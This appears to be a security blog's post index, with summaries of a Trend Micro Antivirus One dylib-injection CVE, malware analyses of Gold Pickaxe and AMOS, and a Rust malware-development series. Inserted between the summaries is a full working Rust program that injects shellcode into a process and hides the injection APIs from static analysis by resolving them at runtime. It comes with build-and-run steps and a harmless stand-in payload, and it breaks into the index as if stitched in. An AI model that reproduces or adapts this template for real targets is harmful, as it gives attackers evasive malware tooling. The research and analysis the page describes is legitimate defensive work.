Blog
May 6, 2024 • 6 min read • macOS
CVE-2024-34456: Trend Micro Antivirus One Dylib Injection
During a red teaming activity we gained access to a company MacBook; Trend Micro Antivirus One was running on it and prevented us from running our tools without being detected. So I analyzed the software and found a misconfiguration that allows injecting a custom dylib into the application process. CVE-2024-34456 has been assigned to this issue, which affects Trend Micro Antivirus One version 3.10.3 and below. I reported it on February 6, 2024, and, according to Trend Micro, following its resolution the public disclosure was scheduled for today, May 6, 2024....
April 19, 2024 • 12 min read • malwares
Gold Pickaxe iOS Technical Analysis: IPA Overview and C2 Communication Startup
In February 2024 Group-IB wrote a blog post about a mobile Trojan called Gold Pickaxe, developed by a Chinese-speaking cybercrime group. This malware targets both iOS and Android users in the Asia-Pacific region in order to collect identity documents, SMS messages, pictures and other data from the compromised phones. The malware communicates with the C2 using two protocols: the WebSocket protocol, used to listen for incoming commands, and the HTTP protocol, used to send information and data to the C2. In this article we are going to analyse the IPA file and then describe how the malware connects to the C2 WebSocket server....
March 1, 2024 • 11 min read • malwares
AMOS (Atomic macOS Stealer) Analysis
Hello everybody, this is my first macOS malware analysis. I took a sample from MalwareBazaar and tried to reverse it; the sample was uploaded by Cryptolaemus1 on 14 Feb 2024. While analysing stage two, it became clear that the sample is a variant of Atomic Stealer. Atomic Stealer, as reported by SentinelOne, is a macOS info stealer sold on Telegram, able to grab system information, account credentials, browser data, session cookies and crypto wallets....
November 20, 2023 • 11 min read • rust
Rustware Part 3: Dynamic API resolution (Windows)
In the previous blog post we saw how to perform shellcode process injection after finding the target process PID using several WinAPIs; in that case all the WinAPIs were called directly, so their names sit in the import table of the binary. Malware usually resolves WinAPI addresses at runtime instead, in order to hide its malicious behaviour from static analysis. I have to thank Jacopo for his feedback; he helped me improve the code. In this blog post we will see how to use two well-known WinAPIs to resolve WinAPI addresses dynamically: GetModuleHandle, used to get the base address of a loaded module, and GetProcAddress, used to get the address of an exported WinAPI function from that module....
November 6, 2023 • 9 min read • rust
Rustware Part 2: Process Enumeration Development (Windows)
In the previous blog post we saw how to develop shellcode process injection in Rust. The described process injection flow relies on several WinAPIs: OpenProcess opens a handle to the target process; VirtualAllocEx then allocates a new readable and writable region of memory in the target process; WriteProcessMemory writes the shellcode into the newly allocated memory; VirtualProtectEx changes the protection of that memory to readable and executable; and finally CreateRemoteThread executes the shellcode contained in the newly allocated memory inside the target process....
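As an added example that is not code from the Rustware posts, here is the five-step flow summarised above written in Rust, combined with the dynamic resolution technique described in the Part 3 summary: the five WinAPIs of the injection chain are looked up at runtime through GetModuleHandleA and GetProcAddress instead of being imported directly. It assumes Windows x64, the exports of kernel32.dll, and, to keep it harmless, the current process as the injection target; the six-byte shellcode (`mov eax, 42 ; ret`) is constructed for the example so that the remote thread's exit code can be checked.

```rust
// Added example, not the Rustware posts' own code: the five-step injection flow
// with each WinAPI in the chain resolved at runtime via GetModuleHandleA and
// GetProcAddress. Windows x64 only; the Win32 parts are gated on cfg(windows)
// so the file still builds elsewhere. The target is the current process.
#[cfg(windows)] use std::ffi::{c_void, CString};
#[cfg(windows)] use std::ptr::null_mut;

// Still imported statically: the resolver itself plus housekeeping calls.
#[cfg(windows)] #[allow(non_snake_case)] #[link(name = "kernel32")]
extern "system" {
    fn GetModuleHandleA(name: *const u8) -> *mut c_void;
    fn GetProcAddress(module: *mut c_void, name: *const u8) -> *mut c_void;
    fn GetCurrentProcessId() -> u32;
    fn WaitForSingleObject(handle: *mut c_void, millis: u32) -> u32;
    fn GetExitCodeThread(handle: *mut c_void, code: *mut u32) -> i32;
    fn CloseHandle(handle: *mut c_void) -> i32;
}

// Typed pointers matching the Win32 prototypes (HANDLE/LPVOID = *mut c_void, BOOL = i32).
#[cfg(windows)] type OpenProcessFn = unsafe extern "system" fn(u32, i32, u32) -> *mut c_void;
#[cfg(windows)] type VirtualAllocExFn = unsafe extern "system" fn(*mut c_void, *mut c_void, usize, u32, u32) -> *mut c_void;
#[cfg(windows)] type WriteProcessMemoryFn = unsafe extern "system" fn(*mut c_void, *mut c_void, *const c_void, usize, *mut usize) -> i32;
#[cfg(windows)] type VirtualProtectExFn = unsafe extern "system" fn(*mut c_void, *mut c_void, usize, u32, *mut u32) -> i32;
#[cfg(windows)] type CreateRemoteThreadFn = unsafe extern "system" fn(*mut c_void, *mut c_void, usize, *mut c_void, *mut c_void, u32, *mut u32) -> *mut c_void;
#[cfg(windows)] const PROCESS_ALL_ACCESS: u32 = 0x001F_0FFF;
#[cfg(windows)] const MEM_COMMIT: u32 = 0x1000;
#[cfg(windows)] const MEM_RESERVE: u32 = 0x2000;
#[cfg(windows)] const PAGE_READWRITE: u32 = 0x04;
#[cfg(windows)] const PAGE_EXECUTE_READ: u32 = 0x20;
#[cfg(windows)] const INFINITE: u32 = 0xFFFF_FFFF;

/// Dynamic resolution: GetModuleHandleA returns the base of an already loaded
/// module, GetProcAddress looks `symbol` up in its export table. None on failure.
#[cfg(windows)]
fn resolve(module: &str, symbol: &str) -> Option<*mut c_void> {
    let module = CString::new(module).ok()?;
    let symbol = CString::new(symbol).ok()?;
    unsafe {
        let base = GetModuleHandleA(module.as_ptr() as *const u8);
        if base.is_null() { return None; }
        let addr = GetProcAddress(base, symbol.as_ptr() as *const u8);
        if addr.is_null() { None } else { Some(addr) }
    }
}

// Resolve a kernel32 export and cast it to its typed function pointer.
#[cfg(windows)]
macro_rules! resolve_api {
    ($ty:ty, $name:literal) => {
        unsafe { std::mem::transmute::<*mut c_void, $ty>(
            resolve("kernel32.dll", $name).ok_or(concat!("cannot resolve ", $name))?) }
    };
}

/// Runs the injection flow against the current process and returns the remote
/// thread's exit code, i.e. whatever the shellcode left in EAX before `ret`.
#[cfg(windows)]
fn inject_self(shellcode: &[u8]) -> Result<u32, String> {
    let open_process = resolve_api!(OpenProcessFn, "OpenProcess");
    let virtual_alloc_ex = resolve_api!(VirtualAllocExFn, "VirtualAllocEx");
    let write_process_memory = resolve_api!(WriteProcessMemoryFn, "WriteProcessMemory");
    let virtual_protect_ex = resolve_api!(VirtualProtectExFn, "VirtualProtectEx");
    let create_remote_thread = resolve_api!(CreateRemoteThreadFn, "CreateRemoteThread");
    unsafe {
        // 1. handle to the target (here: ourselves)
        let process = open_process(PROCESS_ALL_ACCESS, 0, GetCurrentProcessId());
        if process.is_null() { return Err("OpenProcess failed".into()); }
        // 2. RW region (not RWX), so the later protection change is a distinct step
        let region = virtual_alloc_ex(process, null_mut(), shellcode.len(), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
        if region.is_null() { CloseHandle(process); return Err("VirtualAllocEx failed".into()); }
        // 3. copy the shellcode in
        let mut written = 0usize;
        let ok = write_process_memory(process, region, shellcode.as_ptr() as *const c_void, shellcode.len(), &mut written);
        if ok == 0 || written != shellcode.len() { CloseHandle(process); return Err("WriteProcessMemory failed".into()); }
        // 4. flip the region to RX
        let mut old = 0u32;
        if virtual_protect_ex(process, region, shellcode.len(), PAGE_EXECUTE_READ, &mut old) == 0 {
            CloseHandle(process); return Err("VirtualProtectEx failed".into());
        }
        // 5. run it and collect the exit code
        let thread = create_remote_thread(process, null_mut(), 0, region, null_mut(), 0, null_mut());
        if thread.is_null() { CloseHandle(process); return Err("CreateRemoteThread failed".into()); }
        WaitForSingleObject(thread, INFINITE);
        let mut code = 0u32;
        GetExitCodeThread(thread, &mut code);
        CloseHandle(thread);
        CloseHandle(process);
        Ok(code)
    }
}

// Constructed x64 shellcode `mov eax, 42 ; ret`: the thread returns 42, which becomes its exit code.
#[cfg(windows)] const RET_42: [u8; 6] = [0xB8, 0x2A, 0x00, 0x00, 0x00, 0xC3];

#[cfg(windows)] fn main() { println!("remote thread exit code: {:?}", inject_self(&RET_42)); }
#[cfg(not(windows))] fn main() { eprintln!("this example only runs on Windows x64"); }
```

Build and run it on a Windows x64 box with `rustc inject.rs && .\inject.exe`; a dump of the import table (for example `dumpbin /imports inject.exe`) then shows GetModuleHandleA and GetProcAddress but none of the five injection APIs, which is the whole point of resolving them at runtime. Allocating RW first and switching to RX afterwards, rather than asking for RWX up front, is the same ordering the post describes.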
October 27, 2023 • 11 min read • rust
Rustware Part 1: Shellcode Process Injection Development (Windows)
Malware development is essential when performing activities like Red Teaming, Adversary Emulation and Network Penetration Testing, the operator can use custom malwares to perform various tasks based on the specific situation. At the same time, analyzing Malwares is useful to learn how malwares work and how to detect them, in order to defend our companies from threat actors. For these reasons I studied several books and courses about Windows Internals, Malware Development and Malware Analysis....